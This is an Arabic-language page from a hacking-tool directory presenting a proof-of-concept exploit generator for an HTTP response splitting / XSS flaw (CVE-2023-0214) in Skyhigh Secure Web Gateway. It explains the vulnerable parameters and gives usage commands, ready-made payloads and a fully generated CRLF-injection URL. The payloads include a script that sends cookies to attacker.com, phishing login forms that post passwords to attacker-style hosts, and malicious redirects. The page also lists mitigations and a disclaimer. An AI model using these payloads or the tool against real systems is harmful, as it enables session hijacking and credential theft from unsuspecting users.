Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-0214 — بوابة الويب الآمنة 10.2.11 - البرمجة النصية عبر المواقع (XSS) | Kitploit
أدوات/GitHubGitHub/0pts/cve-2023-0214
أدوات التصيدتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHub0pts/cve-2023-0214

CVE-2023-0214

بوابة الويب الآمنة 10.2.11 - البرمجة النصية عبر المواقع (XSS)

عرض المستودع
24منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SWG Exploit Generator

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

بواسطة 0PTS

إثبات مفهوم لثغرة HTTP Response Splitting في Skyhigh Secure Web Gateway (المعروفة سابقًا باسم McAfee Web Gateway).

حول الثغرة

ثغرة حرجة من نوع HTTP Response Splitting في Skyhigh Secure Web Gateway، تسمح بتنفيذ هجمات XSS عن بعد عبر حقن كود HTML/JavaScript عشوائي.

التفاصيل الفنية

  • النوع: HTTP Response Splitting / Cross-Site Scripting (XSS)
  • الخطورة: عالية
  • ناقل الهجوم: عن بعد، لا يتطلب مصادقة

مبدأ عمل الأداة

توجد الثغرة في المكوّن الإضافي "Ssos" (الإجراء SetLoginToken)، الذي يعالج معلمات URL بشكل غير صحيح:

  1. المعامل "p" → يُحقن في رأس P3P
  2. المعامل "c" → يُحقن في نص الاستجابة
  3. المعامل "v" → يُحقن في ملف تعريف الارتباط MwgSso

نظرًا لعدم تعقيم أحرف السطر الجديد (\r\n / %0d%0a)، يمكن للمهاجم:

  • حقن رؤوس HTTP عشوائية
  • تجاوز Content-Type و Content-Length
  • حقن كود HTML/JavaScript عشوائي

يتجاهل المتصفح باقي محتوى الاستجابة بعد تحديد Content-Length بشكل صحيح، مما يسمح باستبدال المحتوى المعروض بالكامل.

الاستخدام

التشغيل الأساسي

root@kitploit:~
python explot.py

مع المعاملات (مثل nmap)

root@kitploit:~
# XSS أساسي
python explot.py -d example.com -p "<script>alert(document.domain)</script>"

# إعادة توجيه
python explot.py -d target.com -p '<meta http-equiv="refresh" content="0;url=https://evil.com/">'

# نموذج تصيد
python explot.py -d bank.com -p '<form action="https://evil.com/steal"><input name="pass" placeholder="Password"><button>Login</button></form>'

# عنوان URL فقط (وضع هادئ)
python explot.py -d example.com -p "<script>alert(1)</script>" -q

المعاملات

root@kitploit:~
-d, --domain    النطاق المستهدف (الافتراضي: google.com)
-x, --prefix    بادئة مسار URL (الافتراضي: مسار SWG الداخلي)
-p, --payload   حمولة HTML/JavaScript
-q, --quiet     وضع هادئ - عنوان URL فقط
-v, --version   إصدار البرنامج النصي
-h, --help      المساعدة

أمثلة على الحمولات

XSS مع سرقة ملفات تعريف الارتباط

root@kitploit:~
<script>fetch('https://attacker.com/log?c='+document.cookie)</script>

نموذج تصيد

root@kitploit:~
<html>
<body style="font-family:Arial">
<h2>Session Expired - Please Login Again</h2>
<form action="https://attacker.com/phish" method="POST">
<input type="text" name="user" placeholder="Username"><br>
<input type="password" name="pass" placeholder="Password"><br>
<button>Login</button>
</form>
</body>
</html>

إعادة توجيه إلى موقع ضار

root@kitploit:~
<meta http-equiv="refresh" content="0;url=https://malicious-site.com/">

عرض توضيحي

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝

[+] Target Domain:   example.com
[+] Payload Length:  43 bytes
[+] URL Length:      234 chars

[+] Generated URL:

http://example.com/mwg-internal/de5fs23hu73ds/plugin?target=Ssos&action=SetLoginToken&v=1&c=1&p=p%0D%0AContent-Type%3A%20text%2Fhtml%3Bcharset%3Dutf-8%0D%0AContent-Length%3A%2043%0D%0A%0D%0A%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

الحماية

  1. قم بتحديث Skyhigh SWG إلى أحدث إصدار
  2. استخدم WAF مع تصفية حقن CRLF
  3. راقب الطلبات المشبوهة إلى /mwg-internal/*

إخلاء مسؤولية

⚠️ تنبيه: هذه الأداة مخصصة حصريًا لـ:

  • اختبار الاختراق المصرح به
  • الأغراض التعليمية
  • مسابقات CTF
  • أبحاث الأمان

استخدامها ضد أنظمة دون إذن صريح من المالك غير قانوني.

المصادر

  • https://www.exploit-db.com/exploits/51237
  • نشرات أمان Skyhigh Security

root@kitploit:~
██████╗ ██████╗ ████████╗███████╗
██╔═████╗██╔══██╗╚══██╔══╝██╔════╝
██║██╔██║██████╔╝   ██║   ███████╗
████╔╝██║██╔═══╝    ██║   ╚════██║
╚██████╔╝██║        ██║   ███████║
 ╚═════╝ ╚═╝        ╚═╝   ╚══════╝
تنزيل الأداة